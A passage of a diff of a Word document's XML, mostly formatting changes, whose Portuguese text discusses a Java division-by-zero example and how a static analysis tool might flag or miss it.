-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">            throw new </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>IllegalArgumentException(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>"Não é possível dividir por zero");</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
         <w:t xml:space="preserve">        }</w:t>
@@ -6531,34 +7409,34 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">        return a / b;</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> // o que pode causar que este método/linha seja um falso positivo</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        return a / b; // o que pode causar que este método/linha seja um falso positivo</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
         <w:t xml:space="preserve">    </w:t>
@@ -6566,6 +7444,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
         </w:rPr>
         <w:t>}</w:t>
       </w:r>
@@ -6581,11 +7461,15 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
         </w:rPr>
         <w:t xml:space="preserve">    public static void </w:t>
       </w:r>
@@ -6593,6 +7477,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
         </w:rPr>
         <w:t>main(String[</w:t>
       </w:r>
@@ -6600,6 +7486,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
         </w:rPr>
         <w:t xml:space="preserve">] </w:t>
       </w:r>
@@ -6607,6 +7495,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
         </w:rPr>
         <w:t>args</w:t>
       </w:r>
@@ -6614,6 +7504,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
         </w:rPr>
         <w:t>) {</w:t>
       </w:r>
@@ -6622,11 +7514,15 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
         </w:rPr>
         <w:t xml:space="preserve">        </w:t>
       </w:r>
@@ -6634,6 +7530,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
         </w:rPr>
         <w:t>System.out.println</w:t>
       </w:r>
@@ -6641,6 +7539,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
         </w:rPr>
         <w:t>(</w:t>
       </w:r>
@@ -6648,6 +7548,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
         </w:rPr>
         <w:t>divide(</w:t>
       </w:r>
@@ -6655,6 +7557,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
         </w:rPr>
         <w:t>4, 2)</w:t>
       </w:r>
@@ -6662,6 +7566,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
         </w:rPr>
         <w:t>);</w:t>
       </w:r>
@@ -6671,11 +7577,15 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
         </w:rPr>
         <w:t xml:space="preserve">        </w:t>
       </w:r>
@@ -6683,6 +7593,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
         </w:rPr>
         <w:t>System.out.println</w:t>
       </w:r>
@@ -6690,6 +7602,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
         </w:rPr>
         <w:t>(</w:t>
       </w:r>
@@ -6697,6 +7611,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
         </w:rPr>
         <w:t>divide(</w:t>
       </w:r>
@@ -6704,6 +7620,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
         </w:rPr>
         <w:t>4, 0)</w:t>
       </w:r>
@@ -6711,6 +7629,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
         </w:rPr>
         <w:t>);</w:t>
       </w:r>
@@ -6720,18 +7640,24 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
         </w:rPr>
         <w:t xml:space="preserve">    </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
         <w:t>}</w:t>
@@ -6741,12 +7667,16 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
         <w:t>}</w:t>
@@ -6754,14 +7684,8 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
+        <w:ind w:firstLine="720"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
@@ -6779,19 +7703,15 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
         </w:rPr>
         <w:t>public class Division {</w:t>
       </w:r>
@@ -6800,11 +7720,15 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
         </w:rPr>
         <w:t xml:space="preserve">    public static double </w:t>
       </w:r>
@@ -6812,6 +7736,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
         </w:rPr>
         <w:t>divide(</w:t>
       </w:r>
@@ -6819,6 +7745,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
         </w:rPr>
         <w:t>double a, double b) {</w:t>
       </w:r>
@@ -6827,11 +7755,15 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
         </w:rPr>
         <w:t xml:space="preserve">        return a / </w:t>
       </w:r>
@@ -6839,6 +7771,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
         </w:rPr>
         <w:t>b;</w:t>
       </w:r>
@@ -6848,11 +7782,15 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
         </w:rPr>
         <w:t xml:space="preserve">    }</w:t>
       </w:r>
@@ -6861,18 +7799,24 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
         </w:rPr>
         <w:t xml:space="preserve">    public static void </w:t>
       </w:r>
@@ -6880,6 +7824,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
         </w:rPr>
         <w:t>main(String[</w:t>
       </w:r>
@@ -6887,6 +7833,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
         </w:rPr>
         <w:t xml:space="preserve">] </w:t>
       </w:r>
@@ -6894,6 +7842,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
         </w:rPr>
         <w:t>args</w:t>
       </w:r>
@@ -6901,6 +7851,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
         </w:rPr>
         <w:t>) {</w:t>
       </w:r>
@@ -6909,11 +7861,15 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
         </w:rPr>
         <w:t xml:space="preserve">        </w:t>
       </w:r>
@@ -6921,6 +7877,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
         </w:rPr>
         <w:t>System.out.println</w:t>
       </w:r>
@@ -6928,6 +7886,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
         </w:rPr>
         <w:t>(</w:t>
       </w:r>
@@ -6935,6 +7895,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
         </w:rPr>
         <w:t>divide(</w:t>
       </w:r>
@@ -6942,6 +7904,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
         </w:rPr>
         <w:t>4, 2)</w:t>
       </w:r>
@@ -6949,6 +7913,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
         </w:rPr>
         <w:t>);</w:t>
       </w:r>
@@ -6958,11 +7924,15 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
         </w:rPr>
         <w:t xml:space="preserve">        </w:t>
       </w:r>
@@ -6970,6 +7940,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
         </w:rPr>
         <w:t>System.out.println</w:t>
       </w:r>
@@ -6977,6 +7949,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
         </w:rPr>
         <w:t>(</w:t>
       </w:r>
@@ -6984,6 +7958,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
         </w:rPr>
         <w:t>divide(</w:t>
       </w:r>
@@ -6991,6 +7967,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
         </w:rPr>
         <w:t>4, 0)</w:t>
       </w:r>
@@ -6998,6 +7976,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
         </w:rPr>
         <w:t>);</w:t>
       </w:r>
@@ -7007,18 +7987,24 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
         </w:rPr>
         <w:t xml:space="preserve">    </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
         <w:t>}</w:t>
@@ -7028,12 +8014,16 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
         <w:t>}</w:t>
@@ -7041,22 +8031,56 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Se a ferramenta não identificar esta vulnerabilidade pode causar um erro de execução em runtime e, por exemplo, expor informações sobre a aplicacação (o </w:t>
+        <w:ind w:firstLine="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Se a ferramenta não identificar esta vulnerabilidade pode causar um erro de execução em </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>runtime</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> e, por exemplo, expor informações sobre a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>aplicação</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (o </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
         <w:t>stack</w:t>
@@ -7069,13 +8093,27 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>tecnológico</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t>tecnologico</w:t>
+        <w:t>etc</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -7083,32 +8121,8 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>etc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
         <w:t>) para um cliente/malfeitor.</w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7136,14 +8150,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t>D</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
